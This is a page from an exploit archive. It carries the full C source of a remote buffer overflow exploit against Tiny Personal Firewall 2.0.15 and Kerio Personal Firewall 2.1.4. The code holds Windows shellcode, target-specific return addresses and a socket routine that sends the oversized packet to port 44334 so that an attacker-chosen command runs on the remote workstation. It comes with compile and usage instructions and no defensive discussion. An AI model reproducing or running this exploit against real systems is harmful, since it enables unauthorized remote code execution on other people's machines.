Tiny & Kerio Personal Firewalls remote root buffer overflow

    
 
     * Version TXT Disponible ici *


                              /**************************************************
                              *    Personal Firewall Engine remote buffer overflow Exploit    *
                              **************************************************
                              *
                              * Coded By ThreaT.
                              *
                              **************************************************
                              *
                              * This exploit take advantage of the vulnerability 
                              * and execute a command on remote workstations
                              * equiped with the fallowing PSW :
                              *
                              * - Tiny Personal Firewall 2.0.15
                              * - Kerio Personal Firewall 2.1.4
                              *
                              **************************************************
                              * PFExploit.exe   
                              * ===========================================
                              * ompile with : cl.exe /nologo PFExploit.c /link wsock32.lib    
                              * ===========================================
                              */


                              #include 
                              #include 

                              #define len 0x1494

                              void main (int argc, char *argv[])
                              {
                              SOCKET sock1;
                              SOCKADDR_IN sin;
                              int i;
                              DWORD byte = htonl(len);

                              char buffer[len], *p,

                              shellcode[] = 

                              "\xEB\x69\x6A\x30\x5B\x64\x8B\x03\x8B\x40\x0C\x8B\x48\x0C\x8B\xC1" 
                              "\x8B\x70\x30\x80\x3E\x4B\x75\x4A\x8B\x40\x18\x8B\x58\x3C\x03\xD8" 
                              "\x8B\x5B\x78\x03\xD8\x8B\x73\x1C\x03\xF0\x56\x8B\x73\x24\x03\xF0" 
                              "\x56\x8B\x53\x20\x03\xD0\x8B\x5B\x18\x4B\x8B\x34\x9A\x03\xF0\x03" 
                              "\x74\x24\x10\x8B\x36\x39\x74\x24\x0C\x74\x08\x4B\x23\xDB\x75\xEA" 
                              "\x58\x58\xC3\x5F\x33\xC9\x66\x8B\x0C\x5F\x5F\x8B\x3C\x8F\x8D\x04" 
                              "\x07\xC3\x8B\x18\x39\x08\x8B\xC3\x75\xA6\xC3\xEB\x22\x6A\x01\x68" 
                              "\x69\x6E\x45\x78\xE8\x89\xFF\xFF\xFF\x6A\x01\xFF\x74\x24\x0C\xFF" 
                              "\xD0\x6A\x01\x68\x78\x69\x74\x50\xE8\x75\xFF\xFF\xFF\xFF\xD0\xE8"
                              "\xD9\xFF\xFF\xFF";

                              WSADATA wsadata;
                              WORD wVersionRequested = MAKEWORD (2,0);

                              struct _target {

                              char Name[4];
                              char *RetAddr;
                              char *App;

                              } targ[2] = {

                              {"TPF" , "\xED\xEA\x2F\x01", "Tiny Personal Firewall 2.0.15"},
                              {"KPF" , "\xF8\xEA\x61\x01", "Kerio Personal Firewall 2.1.4"},
                              };


                              printf ("######################################################\n"
                              "Personal Firewall Engine, Remote buffer overflow Exploit !\n"
                              "#####################################################\n"
                              "Discovered by CORE Security Technologies & Coded by ThreaT\n-\n"
                              "\n"
                              "http://s0h.cc/~threat\n-\n\n");

                              if (argc < 4)
                              {
                              printf ("usage : PFExploit.exe   \n\n"
                              "TARGET ARE\n"
                              "__________\n\n"
                              "TPF : for Tiny Personal Firewall 2.0.15\n"
                              "KPF : for Kerio Personal Firewall 2.1.4\n\n");

                              ExitProcess (0);
                              }

                              if (!(p = (char *) LocalAlloc (LPTR,(strlen (shellcode)+strlen(argv[3])+3))))
                              {
                              printf ("error, cannot allocate memory\n");
                              ExitProcess (0);
                              }


                              memset (buffer,0x90,len);

                              strcpy (p,shellcode);
                              lstrcat (p,argv[3]);
                              memcpy (&buffer[200],p,strlen (p)+1);

                              for (i=0; i < 2 ; i++)
                              if (!lstrcmpi (argv[1],targ[i].Name)) break;

                              if (i > 1)
                              {
                              printf ("Erreur : la cible %s est inconnue\n",argv[1]);
                              ExitProcess (0);
                              }


                              if (WSAStartup(wVersionRequested, &wsadata)) 
                              {
                              printf ("Erreur d'initialisation Winsock\n");
                              ExitProcess (0);
                              }


                              sin.sin_family = AF_INET;
                              sin.sin_addr.s_addr=inet_addr (argv[2]);
                              sin.sin_port = htons (44334);


                              memcpy (&buffer[0x1490],targ[i].RetAddr,4);

                              printf ("Cible : %s\n\n"
                              "Connecting to %s...", targ[i].App, argv[2]);

                              sock1 = socket (AF_INET, SOCK_STREAM, 0);
                              bind (sock1, (SOCKADDR *)&sin, sizeof (sin));
                              if ( connect (sock1,(SOCKADDR *)&sin, sizeof (sin)) )
                              {
                              printf ("connexion failed !\n");
                              ExitProcess (0);
                              }

                              printf ("ok!\n\n"
                              "sending crash for remote execution of '%s'...",argv[3]);

                              Sleep (1000);
                              send (sock1,(const char FAR *)(DWORD)&byte,sizeof (DWORD),0);
                              send (sock1,buffer,len,0);

                              puts ("ok");

                              }
                              

   

   

 Audits de Sécurité & Tests Intrusifs F-VNS Security™  Mailing Listes Advisories  Service Publicitaire

Tous droits réservés © 2002-2004 K-OTiK Security Voir Notice Légale   

actualité informatique  Exploits